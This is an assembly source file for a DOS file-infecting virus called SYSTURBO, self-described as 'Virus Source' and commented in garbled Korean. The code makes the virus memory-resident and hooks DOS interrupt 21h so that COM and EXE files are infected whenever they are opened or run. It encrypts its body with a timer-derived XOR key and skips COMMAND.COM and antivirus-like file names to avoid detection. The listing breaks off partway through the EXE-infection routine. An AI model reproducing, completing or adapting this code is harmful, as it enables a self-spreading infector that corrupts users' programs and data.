HPAVC / HPAVC CD-ROM.iso / KOREACOL.ZIP / SYSTURBO.ZIP / SYSTUR2.ASM
Assembly Source File | 1996-07-27 | 38KB | 1,021 lines
;╖í ña╖í£ß»aôe ╡ü╕σ╡A ╨a╖í╔I OSCò╖╤í╥A╡A ╡⌐¥a╣vöσ SYSTURBO
;ña╖í£ß»a╖ü ╕≈»ó ñß╣e╖│ôíöa. ïí╣Ñ╖ü ÑA╚a ñß╣e╡A¼ß╡┴ôe ág╖í
;öaƒe ïíôw╖i êa╗íëí ╖╢»sôíöa.
;╖▒╤w╚é│íêa áeùe ╚ßÑíñé»Ñ╖e ╣A SYSTURBO ña╖í£ß»a╖ü ┤|╡A
;CALL íw¥w╖i ┴B╟a╨aößèà╢a.. ïa£ü¼ß ╖í₧ü╦Ñòí ┤⌠┤ûëí Öí.
;┤|ªüªà╖ü ┤q╤í╤┴ ╬üôe ªüªà╖ü ₧ü╦Ñ╖í ò╖╖⌐╨e ┼íùaêa ûI«ü╖╢╖aíe
;╕ΓëA ╨üæ╓»sôíöa. ëí╕≈╕Γ╖Ñ ┼íùaôe öaƒe ╬ëïaƒ▒╡A¼ßòí ¼a╢wûE
;╡üƒi ùi┤ß mov ax,cs/mov ds,ax ╖í£σ ┼íùa╖íïí╡A ñé»Ñ ╣A╣í»í
;╕a├╡ áΘ╝≈╨e ╧a¥íïa£æ╖i ╡í╠e╨i«ü ╖╢ôe ïí╥Aƒi ág╖í ║ü┤÷»sôíöa.
;╤┴╖⌐╖e 16╖a¥í ÉaÆü┤ß¼ß 7╖í Éq╖aíe êq╡q╖i ┤e╨sôíöa. óë¥Ñ
;êq╡q»í 16╖a¥í ÉaÆü┤ß¼ß 7╖í ÉqëA ╨üæ╓ïí╡A öa»í êq╡q╨aôe ╖⌐╖e
;┤⌠»sôíöa.(ÑA╚añß╣e╖e 5êa Éq╖aíe êq╡q ═íïí..)
;êq╡q╢A╡Aôe ┤aóü╖⌐òí ╨a╗í ┤g»sôíöa. öe╗í êq╡qáe ╨i¬à╖í║a....
;╕ßòí ╡ß╖Ñ╗í ííƒa╗íáe öa╟a┤ßÑE╣a»ó╖ü ¼w║ü¥íôe EMS¼w╚ü╡A¼ß
;êq╡qûE ╤┴╖⌐╖í └ß╖q »⌐╨ù»í pklite 1.03ñß╣eë┴ exepack 4.0
;ñß╣e╖a¥í ┤s┬éûE ╤┴╖⌐ë┴ ╕bò╖╖í ╕i ┤eûSôíöa. ïa£ü¼ß └ß╖q »⌐╨ù
;ûAôe êq╡qûE ╤┴╖⌐╖ü »⌐╨ù╖e ╡ü₧ü¼i¥Q╖ü ╕ü¥íù╖ ïíñ≤╖i ░÷»sôíöa.
;ëí¥í ¡í»aêa ï⌐┤ß╣v╗íáe ïí╣Ñ öa╟a┤ßÑE╣aÉa ╡ü₧ü¼i¥Q╖í EMS╡A¼ß
;╕i ╕bò╖╖í ┤eûAöσ ê⌡╖e ëí┴vöaëíÉa ╨iîa╢a..?
;¼w║ü ╡aªüôe ÑB╚ß╔A╖íºi║ù CP/M└߃í ₧ü╦Ñ╖í ╖╢ôe 8ña╖í╦a ╡w╡b╖í
;╖╢»sôíöa. ╕ßôe ╖íê⌡║ù ╨eña╖í╦aƒi ╖í╢w ╖í êt╖í 25h╖ííe ¼w║üƒi
;═íïí╨sôíöa. └qëí¥í DIR-IIòí ╖í ªüªà╖i │aôeòA ╣Aê⌡ë┴ ╢ß├íƒi
;╦iƒíëA╨ü¼ß ┬ùò⌐╖i áb┤v»sôíöa. ╖í ╧a¥íïa£æ╖ü ╦b╗╖╖e XOR¥í
;┤q╤í╤┴ ╨aôeê⌡ë┴ ┤|ë┴ ûß╖ü ╧a¥íïa£æ╖ü ï⌐╖íêa êaÑe╖í£aôe ╕±╖│ôíöa.
;ïa£ü¼ß ïí╣Ñ ╨eèé╤w ñé»Ñùi╖í ╡í╧a¡U╖ü ┤ßÿσ ña╖í£ß»aóà╕a╡i╖i └x┤a
;├í₧a╨aôe ïa£σ êeöe╨e ₧ü╦Ñ╖a¥íôe í╡├í₧a╨aëA ╨û»sôíöa.
;óë¥Ñ SYSTURBOña╖í£ß»a╡┴ ò╖╖⌐ ₧ü╦Ñ╖íôí ñé»Ñ╖e êaôw╨sôíöa.
;╨a╗íáe....
;»⌐╨ùûEôa ╤┴╖⌐║ù ╖íƒq╡A V,C,WHPôe ╧í╨ü¼ß êq╡q╨sôíöa. ñé»Ñë┴ »a─à
;ïaƒíëí COMMAND.COM(╢a¼üôe ï⌐╖íêa ñaÄßíe ªü╦╖»í ╡A£ßêa Éa¼ß...)
;áa╗íáb╖a¥í ┤a£ü┤a ╨eïi╖i ╧í╨aïí ╢ß╨eê⌡╖│ôíöa.
;ïí╣Ñ ÑA╚a╔A»a╚ßùi(OSCò╖╤í╥A ╥A╢Ñùi)╖í ┤a£ü┤a ╨eïië┴ VPIC╡A¼ß ╡A£ß
;êa Éeöaëí ╨a»Ñªàùi╖í ág╖eòA ╖í╕±╖i öa ═í╢w╨ûëí..Öí └ß╖q »⌐╨ù»í
;PACKED FILE IS CORRUPTED£aôe ╖íƒq╖í Éa╡íëí öa»í »⌐╨ù╨aíe ╕i ╕bò╖
;ûA┤÷öσ ╡A£ßòí ┤⌠┤û»sôíöa.
;╤e╕üôe ëA╖▒ ╢ß╕aùa£aôe ╧a¥íïa£æ »⌐╨ù╥ü êq╡qûE ╤┴╖⌐╖i »⌐╨ù╨aíe ╡A£ß
;êa Éa╗íáe ╣Aê⌡¬à╖í ┤aôí£a PKLITE/EXEPACK/DIET ╖í£σ ííùe ╤┴╖⌐╖í
;╡A£ßƒi Éüôeê⌡ Ñíôí ╣Aê⌡áe╖í ┤aôí£a ëA╖▒ ╢ß╕aùa╖í ╡A£ß╖Ñê⌡ ê{»sôíöa.
;╣Aêa ái╨e EMS╡A¼ß╖ü ╡A£ßòí ╤e╕ü ╡a£ßªàùi╖í ág╖í êa╗íëí ëü»Ñ ╡UÉi
;PCTOOLS4.22ñß╣eáe╖í ïa£≤ôíöa. ╖íê⌡╖í EXEPACK4.0╖a¥í ┤s┬é╖í ûA┤ß
;╖╢ôeòA ╖í ╡┴╖⌐ûß╡A óü┤⌡╖í ª¢ïíáe ╨aíe ëA╖▒ ╢ß╕aùa¼a╢w╥ü ╡A£ßêa
;ñi¼ù╨sôíöa. ïa╢A╡Aôe ╡┼╕σ╙í ╡A£ßêa ┤⌠öaëí ╕wöq╖e í╡╨a╗íáe ╣A ─±╡A¼ß
;ôe ┤a╗ó ╡A£ßƒi └x╗í í╡╨û»sôíöa.
;╣Aê⌡╡A¼σ ╡A£ßêa ┤⌠ôeòA ╡ß ╡A£ßêa ╖╢öaôeêσ╗í...
;¼a╢w╤┼ëw╖i ╕i ¡U╦╖╨aíe ╕i ╕bò╖╨sôíöa. ïaƒíëí ûI«ü╖╢╖aíe EMSíAííƒíôe
;╡⌐ƒíëí │a╗í áa¡A╢a. ïí╚a ╤┴╖⌐ùië┴ ┬ùò⌐╖í ╖╢╖i«ü ╖╢»sôíöa.
;╕≈ái╖í╡ü╢a..
;ïa╢A╖ü ╦b╖í╨e ╕±╖e ┤⌠»sôíöa. ╖⌐ñe ña╖í£ß»a╡┴ öaƒiê⌡╖í ┤⌠»sôíöa.
;öa╖qñσ╡Aôe »a╔I»a ïíñ≤╖i òí╖│╨a╡a òí»a »í╕w╖í ╢σòí╢ü╡A ╡┼╕σ╙í ú⌐ƒíïí
;╕σ╡A ╥Bïí╕Γ╖Ñ ┤a╖í╔Q╖i êa╗íëí ╕ü ┬ë╤e╨iê⌡╖i öa╗▒╨sôíöa.
;╖í ña╖í£ß»a╡A èùïq╨e╕±╖í ╖╢öaíe ëA»í╠e╡A ╗⌐óà╖í£aëí ╡⌐ƒí»íëí ╗⌐óà
;Éü╢w╖i ░ß║ü¡A╢a. ╣Aêa í⌐£ü ùi┤ß╡┴ ╖¬ëí íA╖⌐╖i ÑíÉü ùaƒíëV»sôíöa.
;óë¥Ñ ïa íA╖⌐╖i ÑíÉà ┤a╖íùíôe ╣A ┤a╖íùíêa ┤aô⌐╔Aôí ïaë╡╖a¥í íA╖⌐╖e
;ÑíÉü╗í áa»íëí╢a.
;ïa£± ╡eèü╨üÑí¡A╢a ╨eïi¥í ║ü¼Γ╖i öi┤v╖aôíîa╢a.
;╚ßÑí┤ß¡Q╖a¥í ─±╠a╖⌐ ╨û»sôíöa.
;***********************************************************
;
; Ninth Edition For Virus Source
; (ña╖í£ß»a ¡í»a ┤a╤│ñσ╝ü áaöw)
; This can be processed in EMS memory
; ( ╖í ñß╣e╖e EMS╡A¼ßòí ╕i ╕bò╖╖í ûSôíöa)
; But! Can't Infect When File Is Opend
; (╨a╗íáe ╡í╧e»í╡Aôe êq╡q╖i ┤e╨sôíöa)
;
;***********************************************************
BYTESIZE EQU (finish - start) ;╗Ñ╝a ña╖í£ß»a┼íùa
;ï⌐╖í
HEADSIZE EQU (virus_body - start) ;┤|╡A ┤q╤í╬üôeªüªà╖ü
;┼íùaï⌐╖í
PARASIZE EQU ((BYTESIZE+0Fh)/10h) ;╕σ┴A╟aïí╖ü ╠ü£ßïa£ü╧a«ü
;(¼w║ü»í ºi£Γ╟aïí ëi╕≈╢w
;╖a¥í │a╖▒)
BODYSIZE EQU (finish - virus_body) ;┤q╤í╤┴╨aôe ªüªà╖ü ╟aïí
GAJASIZE EQU 16 ;╗Ñ╝a ña╖í£ß»a ┤|╡A ª¢ôe
;16 BYTES ╟aïí╖ü │a¥Aïí
;┼íùa êò«ü
;***********************************************************
;
; INFECTED FILE'S ROUTINE ( = BATE )
;
;***********************************************************
code segment ;ña╖í£ß»a╡A êq╡qûE
assume cs:code,ds:code ;«é║ü ₧ü╦Ñ
;┤aóü╖⌐òí ┤e╨aëí
mov ah,4ch ;òí»a¥í Éaêq
int 21h
code ends
;***********************************************************
;
; ORIGINAL VIRUS ROUTINE ;╡aïí¼ß ªü╚ß ╗Ñ╝a
; ;ña╖í£ß»a ₧ü╦Ñ
;***********************************************************
main segment
assume cs:main,ds:main
jumps ;╚ßÑí┤ß¡Qáe╖ü ╕±╧a┼íùa ╨eëüƒi
;¼wë┼┤e╨aëí ─±╠a╖⌐╨i«ü ╖╢ôe
start: ;╡ü┤ó┤ß
push cs
pop ds
si_value: mov si,offset virus_body ;└ß╖q ╧a¥íïa£æ╖ü »í╕b offset╖i
;╖│¥b ñhôeöa (êq╡q»í ┤i┤a¼ß ëü¼e)
mov cx,BODYSIZE ;┤q╤íƒi ╬ë í▒┴A ╟aïí╖ü 1/2
mov bx,es
di_value: mov di,offset virus_body ;╢ß╡┴ ò╖╖⌐, ╡aïí¼ß SIôe
;¼wöüñσ╗í ñw»ó╖i ╢ß╨ü │a╖Ñöa
push cs ;(COM ë┴ EXE╖ü »í╕b offset╖í
pop es ;╦i¥a╗íôe ╖í╖A¥í..)
cld
lodsb ;xor¥í öe«à ┤q╤í╤┴
key_value: xor al,00h ;┤q╤í╖ü ╟íêt╖e êq╡q»í ┤i┤a¼ß
stosb ;╖íë╡╡A │a╖Ñöa
loop move_loop
virus_body:
mov si,0000h ;└ß╖q ╧a¥íïa£æ╖ü »í╕b offset ╖│¥b
;êq╡q»í ╕aò╖ ╖│¥b
check_mem:
mov PSP_SEG[si],bx ;╧a¥íïa£æ PSP ¡Aïaáσ╦a ╕ß╕w
mov bx,ds
xor ax,ax
mov ds,ax
mov ah,byte ptr ds:[0c0h] ;ña╖í£ß»a ¼w║ü
cmp ah,25h ;╡aªü ëi╕≈
jz exe_routine
make_tsr:
mov ds,bx
mov ax,PSP_SEG[si]
dec ax
mov es,ax
;MCB ╡A¼ß ╨iöwûE ╠ü£ßïa£ü╧a
mov ax,es:[03h] ;«üƒi ╖¬┤ß¼ß ╕ß╕w╨eöa.
mov ORG_PARA[si],ax ;(¼w║ü╥ü ╠ü£ßïa£ü╧a Ñóèß)
mov es,PSP_SEG[si]
mov bx,0ffffh ;┬Aöü¥í ╖A╢w╨e íAííƒí╖ü
mov ah,4ah ;╟aïíƒi ┤Φôeöa
int 21h ;ªëêaôw╨e ╟aïíƒi ║ü┤ß
jnc exe_routine ;ƒí╚σûE êt╖a¥í ëi╕≈
mov ah,4ah ;ña╖í£ß»a ╟aïíáe╟q ╟aïíƒi
sub bx,(PARASIZE+3)*2 ;║ë╖íëí ╕ü ╨iöw
jc exe_routine
int 21h
mov ah,48h ;ña╖í£ß»a ÑÑ┴Aƒi ╢ß╨e
mov bx,PARASIZE ;╨iöw
int 21h
mov VIRUS_SEG[si],ax
mov ah,48h ;¼w║ü»í ╤┴╖⌐│aïí ╕b┤≤╖i
mov bx,PARASIZE+3 ;╢ß╨e òA╖í╚ß ╡w╡b ╨iöw
int 21h
mov SPACE_SEG[si],ax
mov ax,VIRUS_SEG[si] ;êw╣A¥í MCBƒi ëí┴a »í»a╔Q
dec ax ;╤┴╖⌐╖ÑÉ╖ ¡ó╖Ñöa
mov es,ax
mov word ptr es:[01h],08h ;MCB offset 1 ╖í 08╖ííe
;»í»a╔Q ╡w╡b╖í£a ╡í╠e╨aëí
;òí»aêa íAííƒí ┤e╥A«ü
mov ax,SPACE_SEG[si] ;╢ß╡┴ ò╖╖⌐
dec ax
mov es,ax
mov word ptr es:[01h],08h
mov es,VIRUS_SEG[si]
push si
xor di,di ;ña╖í£ß»aƒi ╨iöw╨e ╡w╡b╖a¥í
mov cx,BYTESIZE ;╖íò╖»í╟Ñöa
cld
rep movsb
pop si
mov es,PSP_SEG[si]
mov bx,ORG_PARA[si] ;╢Ñ£ü╖ü ╠ü£ßïa£ü╧a«ü¥í ╨iöw
mov ah,4ah ;╨ü║ü┤ß ╢Ñ╨ü¼w╚ü╡┴ ê{╖e íAííƒí
int 21h ;╤┼ëw╖a¥í áeùeöa
chng_21:
mov ax,VIRUS_SEG[si] ;╖Ñ╚ߣ≤╦a 21hñσ
mov es,ax ;êa¥í└üïí ₧ü╦Ñ
xor ax,ax
mov ds,ax
mov ax,word ptr ds:[084h]
mov es:INT21_OFF,ax
mov ax,word ptr ds:[086h]
mov es:INT21_SEG,ax
cli
mov word ptr ds:[84h],offset int_21h
mov word ptr ds:[86h],es
sti
carve_marker:
mov ah,25h ;ña╖í£ß»a ¼w║ü ╡aªüƒi
mov byte ptr ds:[0c0h],ah ;╢ß╨e CP/MÑB╚߃i áa─ß
;òA╖í╚ߥí ╖í╢w
jmp_execute: ;¼w║ü»í╟íëíÉa¼ßôe
;╖í₧ü╦Ñ╖i ╖í╢w ╤┴╖⌐╖i
mov ax,es ;╕ü ¥íù╖, »⌐╨ù»í╟Ñöa
push ax
mov ax,offset sub_execute
push ax
retf ;¼w║üûA┤ß ╖╢ôe ªüªà╖a¥í ╕±╧a
;ëièé ú╗╖ü ₧ü╦Ñ╖a¥í ╕±╧a╨eöa
sub_execute:
cli
mov ax,cs ;»a╚é ╕ü╣í╕≈
mov ds,ax
mov ss,ax
mov sp,offset STACK_SPACE + 62
sti
mov es,PSP_SEG
mov word ptr ENV_BLOCK[00h],00 ;╤┴╖⌐ »⌐╨ù╖i ╢ß╨e
mov word ptr ENV_BLOCK[02h],80h ;╤┼ëw ºi£Γ╖ü ╕ü ¼Θ╕≈
mov word ptr ENV_BLOCK[04h],es
mov word ptr ENV_BLOCK[06h],5ch
mov word ptr ENV_BLOCK[08h],00
mov word ptr ENV_BLOCK[0ah],6ch
mov word ptr ENV_BLOCK[0ch],es
mov ah,4ah ;íAííƒíƒi PSPÉqïíëí
mov bx,10h ;öa ╨ü╣A
int 21h
mov es,es:[2ch] ;╤┼ëw ºi£Γ╡A¼ß
xor di,di ;╤┴╖⌐╖ü ╖íƒq╖i ┤Φôeöa
mov cx,7fffh
xor al,al
cld
search_loop: repnz scasb
cmp es:[di],al
loopnz search_loop
mov dx,di ;╖Ñ╚ߣ≤╦a 4bhƒi ╖í╢w╨ü¼ß
add dx,3 ;╤e╕ü╖ü ╤┴╖⌐╖i ╕ü »⌐╨ù╨eöa
mov ax,4b00h
push es
pop ds
push cs
pop es
mov bx,offset ENV_BLOCK
pushf
call dword ptr cs:INT21_OFF
mov es,cs:PSP_SEG ;Éq┤a╖╢öσ PSP╨ü╣A
mov ah,49h
int 21h
mov ah,4dh ;╨a╢ß └߃í₧ü╦Ñ╖ü └߃í┼íùaƒi
int 21h ;┤Φôeöa
mov ah,4ch ;╧a¥íïa£æ ╣╖₧a
int 21h
exe_routine: ;¼w║üûA┤ß ╖╢╖i»í ╖íë╡╖a¥í
;╕±╧a ╨eöa
cmp cs:FILE_TYPE[si],0 ;╤┴╖⌐ ╚a╖│╖í 0╖ííe COM╤┴╖⌐
jz com_routine ;1╖ííe EXE╤┴╖⌐
mov ax,cs:PSP_SEG[si] ;╡íƒí╗íÉi ╤┴╖⌐ ₧ü╦Ñ╖a¥í ╕±╧a╨aïí
mov es,ax ;╢ß╨ü ¡Aïaáσ╦aùi╖i ëü¼e╨ü║àöa
mov ds,ax
add ax,0010h
add cs:EXE_CS[si],ax
add cs:EXE_SS[si],ax
cli
mov ss,cs:EXE_SS[si]
mov sp,cs:EXE_SP[si]
sti
xor ax,ax ;ìó »⌐╨ù»í ax,bxôe 0 ╖í┤ß┤í ╨eöa
xor bx,bx ;┤eïa£ßíe diskcopy.com ê{╖í ûß╡A
;╖Ñ╕aƒi │aôe ╧a¥íïa£æ╖í ╕i ╕bò╖
;┤e╨eöa
jmp dword ptr cs:EXE_IP[si] ;╢Ñ£ü ┼íùa¥í ╕±╧a
com_routine:
mov ax,cs
mov ds,ax
mov es,ax
mov COM_CS[si],ax
mov bx,si
mov ax,offset EXE_HEADER ;╤┴╖⌐╖ü ┤| ╤Aö߃i ╢Ñ£üöü¥í
add si,ax ;ëí├Ñöa(íAííƒí¼w╡A¼ßáe ëí├íïí
mov di,100h ;ÿüóà╡A ╤┴╖⌐╨aëíáe ¼wë┼┤⌠╖q)
cld
movsb
movsw
mov si,bx
xor ax,ax
xor bx,bx
jmp dword ptr COM_IP[si] ;╢Ñ£ü COM╤┴╖⌐╖ü ₧ü╦Ñ╖a¥í
;╕±╧a
int_24h: ;╡A£ß└߃í ╖Ñ╚A£≤╦aƒi
xor al,al ;êa¥í└àöa
iret ;êq╡q»í ¼a╢w
int_21h:
;¼ü¥í╖e 21hñσ ₧ü╦Ñ
pushf
cmp ax,4b00h ;»⌐╨ù╖Ñêa?
jz gariginal
cmp ah,3dh
jz gariginal
original: ;╢Ñ£ü╖ü ╖Ñ╚ߣ≤╦a¥í ╕±╧a
popf
jmp dword ptr cs:INT21_OFF
gariginal:
;ds:dx=file name
push ax ;ííùe ¥A╗í»a╚ß öü╧í
push bx
push cx
push dx
push ds
push es
push si
push di ;╤┴╖⌐╖íƒq╖i ╕ß╕w╨eöa
mov word ptr cs:FILE_NAME[00h],dx
mov word ptr cs:FILE_NAME[02h],ds
get_drive:
cld ;ùa£a╖íºa íw╖i ┤Φôaöa
mov di,dx
xor dl,dl
cmp byte ptr [di+01],3ah
jnz chk_capacity
mov dl,[di]
and dl,1fh
chk_capacity:
mov ah,36h ;ña╖í£ß»aêa │a╡a╗⌐ ╟aïí
int 21h ;áe╟q╖ü ╡a╖A ë╖êe╖í ╖╢Éa?
cmp ax,0ffffh ;╤┬╖Ñ
jz return_back2
mul bx
mul cx
or dx,dx
jnz capacity_ok ;┬A¡í ña╖í£ß»aÑíöa 2ñü╖í¼w╖ü
cmp ax,BYTESIZE*2 ;╡a╖A╡w╡b╖í ╖╢┤ß┤í êq╡q
jb return_back2
capacity_ok:
mov dx,word ptr cs:FILE_NAME[00h]
mov ax,word ptr cs:FILE_NAME[02h]
mov ds,ax
mov si,ds
xor ax,ax
mov ds,ax
les ax,dword ptr ds:[90h] ;╖Ñ╚ߣ≤╦a 24hñσ ñaÄæ
mov word ptr cs:INT24_OFF,ax
mov word ptr cs:INT24_SEG,es
cli
mov word ptr ds:[90h],offset int_24h
mov word ptr ds:[92h],cs
sti
mov ds,si ;ds:dx=file name
xor cx,cx
mov ax,4300h ;╤┴╖⌐ ¡ó¼≈╖i ┤Φôeöa
pushf
call dword ptr cs:INT21_OFF ;cx╡A ╤┴╖⌐ ¡ó¼≈ ƒí╚σ
mov bx,cx
and cl,0feh
cmp cl,bl
je infect_start
mov ax,4301h ;¡ó¼≈╖í │aïí┤eûAôeêßíe
pushf ;¡ó¼≈╖i Ñe╤┼
call dword ptr cs:INT21_OFF
jc return_back1
infect_start:
push ds
push dx
push bx
mov ax,3d02h ;╤┴╖⌐ ╡í╧e
pushf
call dword ptr cs:INT21_OFF
jc open_error
mov bx,ax ;ax ╡A ╨àùi╖í ƒí╚σ
mov cs:FILE_HANDLE,ax
call read_handle ;ÑÑëb ña╖⌐£ß»a └߃í₧ü╦Ñ╖a¥í!
mov bx,cs:FILE_HANDLE
mov ah,3eh ;bx ╡A ╨àùiêt╖i ╕ß╕w
pushf
call dword ptr cs:INT21_OFF
;╤┴╖⌐ ╟i¥í╗a
open_error:
pop cx ;╣▒╕σ╡A bx╡A ╨àùi╖i ╬ü«ß╨ûïí╡A
pop dx ;╖íñσ╡Aôe cx¥í ñh╖q
pop ds ;ëí¥í cxêa ╨àùiêt╖i êxëí ╖╢öa
mov ax,4301h
pushf
call dword ptr cs:INT21_OFF
;╢Ñ£ü ╤┴╖⌐╖ü ¡ó¼≈╖a¥í
;ûAò⌐¥a ║àöa
return_back1:
xor ax,ax
mov ds,ax
cli
mov ax,cs:INT24_OFF
mov word ptr ds:[90h],ax ; 24hñσ ╖Ñ╚ߣ≤╦aƒi
mov ax,cs:INT24_SEG ;ò⌐¥a║àöa
mov word ptr ds:[92h],ax
sti
return_back2:
pop di ;¥A╗í»a╚ß Ñóèß
pop si
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
popf ;ùaùí┤ß ╢Ñ£ü ╖Ñ╚ߣ≤╦a¥í..
jmp dword ptr cs:INT21_OFF
;***********************************************************
;
; HANDLE READ ROUTINE
;
; (ÑÑëb╕Γ╖Ñ ña╖í£ß»a êq╡q ₧ü╦Ñ╖e ╖í ┤e╡A)
;
;
;***********************************************************
read_handle proc near
mov ax,4200h
xor cx,cx
xor dx,dx
pushf
call dword ptr cs:INT21_OFF
jc int_error1
mov ax,cs ;EXE_HEADER£aôe òA╖í╚ß
mov ds,ax ;ñß╠ß╡A ╤┴╖⌐ ¼σûü╡A¼ß 3cháe╟q
mov es,ax ;╖¬┤ß╡Ñöa
mov dx,offset EXE_HEADER ;COM/EXEèüÑi┤e╨eöa
mov cx,40h
mov ah,3fh
pushf
call dword ptr cs:INT21_OFF
jc int_error1
xor cx,cx ;╤┴╖⌐╖ü »⌐╗í ï⌐╖íƒi
xor dx,dx ;┤Φ┤ß ╕ß╕w╨eöa
mov ax,4202h
pushf
call dword ptr cs:INT21_OFF
mov word ptr FILE_SIZE[00],ax
mov word ptr FILE_SIZE[02],dx
cmp ax,BYTESIZE ;ña╖í£ß»aÑíöa ╕b╖e ╤┴╖⌐╖e
ja check_infect ;êq╡q╖i ═íïí╨aëí
cmp dx,0 ;RETURN ╨eöa
je int_error1
check_infect:
;╤┴╖⌐ ï⌐╖íêa 16╖a¥í ÉaÆü┤ß
and ax,000fh ;7 Éq╖aíe êq╡q╖i ┤e╨eöa
cmp ax,0007
jz int_error1
check_exe:
cmp word ptr EXE_HEADER,5a4dh ;╤Aößêa EXE┼íùa ╖Ñêa?
jne check_com ;╤┬╖Ñ╨eöa
mov dx,word ptr EXE_HEADER[3ch] ;╢σòí╢ü ╤┴╖⌐╖ü ╨üößêa
mov cx,word ptr EXE_HEADER[3ch+2];╖╢ôeë╡╖a¥í Üσöa
mov ax,4200h
pushf
call dword ptr cs:INT21_OFF
mov cx,2 ;╢σòí╢ü ╤Aößêa ╣Ñ╕ü╨aÉa
mov dx,offset MARKER ;╤┬╖Ñ╨aïí ╢ß╨ü 2ña╖í╦aƒi
mov ah,3fh ;╖¬┤ß╡Ñöa
pushf
call dword ptr cs:INT21_OFF
cmp word ptr MARKER,454eh ;╢σòí╢ü ╤┴╖⌐╖Ñêa?
jz int_error1 ;áx╖aíe êq╡q ═íïí
mov ax,word ptr EXE_HEADER[04h] ;EXE ╤┴╖⌐╖ü ╕≈Ñí¥í
cmp word ptr EXE_HEADER[02h],00 ;╤┴╖⌐╖ü ╟aïíƒi ┤i┤aÉàöa
jz no_dec
dec ax
no_dec:
mul SECTOR ;dx:ax=╤┴╖⌐ ╟aïí
add ax,word ptr EXE_HEADER[02h] ;╡íñߥA╖í ╤┴╖⌐╖Ñêa
adc dx,00h ;╤┬╖Ñ╨eöa
cmp word ptr FILE_SIZE[00h],ax ;╡íñߥA╖ííe êq╡q╖i
jnz int_error1 ;═íïí╨eöa
cmp word ptr FILE_SIZE[02h],dx ;└qëí:╤Aöß╖ü ╤┴╖⌐╟aïí╕≈Ñí
jnz int_error1 ;╡┴ ╢Ñ£ü╖ü ╤┴╖⌐╟aïíêa
;╦iƒííe ╡íñߥA╖íöa
exe_ok:
mov FILE_TYPE,1 ;EXE╤┴╖⌐╖í£aôe ╬a»í
jmp write_virus
check_com:
cmp byte ptr EXE_HEADER,0e9h ;╕±╧a┼íùa¥í »í╕b╨aôe
je check_com_size ;╤┴╖⌐╖Ñêa ╤┬╖Ñ╨eöa
cmp byte ptr EXE_HEADER,0ebh
jne int_error1
check_com_size:
cmp word ptr FILE_SIZE[00h],0f060h
jnb int_error1 ;61536ña╖í╦aÑíöa ╕b╖aíe
;êq╡q╖i ┤e╨eöa
mov FILE_TYPE,0 ;COM╤┴╖⌐╖í£aôe ╬a»í
write_virus:
lds si,cs:FILE_NAME
xor cx,cx
capitalize:
;╤┴╖⌐íw╖i öa öüóà╕a╤┴ ╨eöa
inc cx
mov al,[si]
or al,al
jz check_slash
cmp al,61h
jb inc_si
cmp al,7ah
ja inc_si
sub byte ptr [si],20h
inc_si:
inc si
jmp capitalize
check_slash: ;╤┴╖⌐ ╖íƒq╖ü áà ┤| ═í╖Ñ╚߃i
;┤Φïí╢ß╨ü ╡b»i£ü«ßîa╗í
;»a─à╨eöa
mov al,[si]
cmp al,'\'
jz find_pointer
cmp al,':'
jz find_pointer
dec si
loop check_slash
find_pointer:
inc si
mov cs:FILE_NAME_START,si ;╤┴╖⌐ »í╕b╕± ═í╖Ñ╚߃i ┤Φôeöa
cld
check_target1:
mov ax,cs
mov es,ax
mov di,offset TARGET_FILE1 ;╤┴╖⌐╖í COMMAND.COM ╖Ñêa?
mov cx,4
repz cmpsb
jnz check_target2
jmp int_error1
check_target2:
mov si,cs:FILE_NAME_START
loop_scan:
mov ax,word ptr ds:[si] ;óà╕a╡i║ù╡A SC╖í£aôe ïi│íêa
cmp ax,'CS' ;╣Ñ╕ü╨aôeêa?
jz int_error1
mov al,ds:[si+1]
cmp al,'.'
jz check_target3
inc si
jmp loop_scan
check_target3:
mov si,cs:FILE_NAME_START
loop_ndos:
mov ax,word ptr ds:[si] ;óà╕a╡i║ù╡A SC╖í£aôe ïi│íêa
cmp ax,'SO' ;╣Ñ╕ü╨aôeêa?
jz int_error1
mov al,ds:[si+1]
cmp al,'.'
jz check_target4
inc si
jmp loop_ndos
check_target4:
mov si,cs:FILE_NAME_START
loop_character:
mov al,ds:[si] ;óà╕a║ù╡A V £aôe ╖íƒq╖í
cmp al,'V' ;╖╢Éa?
jz int_error1
cmp al,'H'
jz int_error1
cmp al,'I'
jz int_error1
mov al,ds:[si+1]
cmp al,'.'
jz virus_process
inc si
jmp loop_character
virus_process:
mov ax,cs
mov ds,ax
mov ax,40h ;ña╖í╡í»a òA╖í╚ß ╡w╡b╡A¼ß
mov es,ax ;£àö±╨e êt╖i ┤Φôeöa
mov ax,word ptr es:[6ch]
mov byte ptr key_value[01h],al ;┤q╤í╤┴ ╨aïí╢ß╨e ╟íêt╖i
and ax,000fh ;╗ó╕≤ ┤q╤í╬üôe ₧ü╦Ñ╡A │eöa
mov RANDOM,ax ;│a¥Aïí ┼íùaƒi ┤Θáaáe╟q
;ª¢╖⌐êσ╗í ëi╕≈╨eöa
add ax,BYTESIZE
mov ALL_BYTE,ax
add ALL_BYTE,GAJASIZE
mov cx,word ptr FILE_SIZE[02h]
mov dx,word ptr FILE_SIZE[00h]
and dx,000fh ;╤┴╖⌐ ¼a╖í╗aƒi 16╖a¥í
add ALL_BYTE,000fh ;ÉaÆü┤ß¼ß 7╖í ÉqëA ╣í╕≈
and ALL_BYTE,0fff0h ;╨eöa
add ALL_BYTE,7
sub ALL_BYTE,dx
mov ax,5700h ;╤┴╖⌐ Éi╝aƒi ┤Φôeöa
pushf
call dword ptr cs:INT21_OFF
mov FILE_DATE,dx
mov FILE_TIME,cx
cmp FILE_TYPE,1 ;╤┴╖⌐╖ü ╣╖ƒA¥í └߃í₧ü╦Ñ ëi╕≈
jz exe_process
cmp FILE_TYPE,0
jz com_process
jmp int_error1
exe_process:
mov ax,word ptr EXE_HEADER[0eh] ;EXE ╨üöß╖ü ╕≈Ñíƒi
mov EXE_SS,ax ;╕ß╕w╨eöa
mov ax,word ptr EXE_HEADER[10h]
mov EXE_SP,ax
mov ax,word ptr EXE_HEADER[14h]
mov EXE_IP,ax
mov ax,word ptr EXE_HEADER[16h]
mov EXE_CS,ax
mov ax,word ptr EXE_HEADER[04h]
cmp word ptr EXE_HEADER[02h],00
jz no_dec2
dec ax
no_dec2:
mul SECTOR
add ax,word ptr EXE_HEADER[02h]
adc dx,00
mov START_POINT2,ax
mov START_POINT1,dx
add ax,ALL_BYTE
adc dx,00
jc int_error1
div SECTOR
cmp ax,0400h
jae int_error1
cmp dx,0
jz no_inc
inc ax
no_inc:
mov word ptr EXE_HEADER[04h],ax ;╤Aö߃i ╕ü╣í╕≈
